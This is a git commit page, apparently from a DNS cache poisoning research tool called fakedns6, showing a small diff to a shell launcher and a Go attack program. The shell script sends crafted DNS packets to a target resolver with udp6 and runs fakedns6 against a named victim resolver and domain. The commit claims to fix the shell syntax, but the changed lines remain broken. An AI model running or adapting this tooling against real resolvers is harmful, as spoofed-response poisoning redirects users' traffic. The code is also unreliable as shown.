summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
author韩丁康 <[email protected]>2023-11-16 16:19:46 +0800
committer韩丁康 <[email protected]>2023-11-16 16:19:46 +0800
commitd66f0baecc69091d92cd6c9ad114d94811829ade (patch)
tree6ce0f95e233d3b1b9487df1e4d8d220f3a8631f5
parent0badf10cef4430b6e401d2053c5baf596c536870 (diff)
20231116-工具代码测试-第4次(修复shell语法问题,go参数重复定义问题)
-rw-r--r--dns_query.sh2
-rw-r--r--src/ucr.edu/fakedns6/attack.go2
2 files changed, 2 insertions, 2 deletions
diff --git a/dns_query.sh b/dns_query.sh
index d8387de..1528df1 100644
--- a/dns_query.sh
+++ b/dns_query.sh
@@ -18,7 +18,7 @@ cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
# fire!
echo "fire"
udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2
-a=$RANDOM % 10
+a=$($RANDOM % 10)
echo $a
if a -gt 8; then
./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1
diff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go
index d72cc9a..435d07d 100644
--- a/src/ucr.edu/fakedns6/attack.go
+++ b/src/ucr.edu/fakedns6/attack.go
@@ -458,7 +458,7 @@ func main() {
soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
//特殊用途
- isfake := flag.String("f", "0", "")
+ isfake := flag.String("F", "0", "")
flag.Parse()
//gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,